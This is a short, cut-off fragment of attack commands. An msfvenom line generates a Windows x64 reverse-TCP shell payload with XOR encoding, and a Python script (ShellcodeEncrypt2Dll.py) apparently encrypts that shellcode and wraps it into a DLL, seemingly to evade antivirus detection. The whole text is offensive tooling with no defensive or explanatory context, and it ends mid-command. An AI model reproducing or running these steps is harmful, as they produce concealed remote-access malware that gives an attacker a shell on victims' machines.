msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 x64/xor_dynamic -f raw > shellcode.raw python ShellcodeEncrypt2Dll.py --non-standalone shellcode ...